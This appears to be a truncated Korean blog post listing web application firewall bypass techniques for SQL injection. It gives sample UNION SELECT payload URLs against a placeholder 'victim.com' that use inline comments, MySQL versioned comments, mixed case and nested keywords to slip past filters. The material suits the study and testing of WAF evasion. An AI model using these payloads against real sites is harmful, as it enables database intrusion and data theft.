우회1 웹 방화벽 우회기법 1. 기본적인 우회 기법 1) 주석처리 방법 http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3..... http://victim.com/news.php?id=1+/*!union*/ /*!select*/ 1,2,3,4…. 2) 대소문자 교체 방법 * 방화벽 필터설정이 다음과 같을 때 /union\select/g http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... 3) 단어 대체 방법 일부 방화벽에서는 SQL 키워드를 제거하는 방식을 사용. http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- (어떤 WAF는 소문자 "union"과 "se.. 2019. 12. 24. 이전 1 다음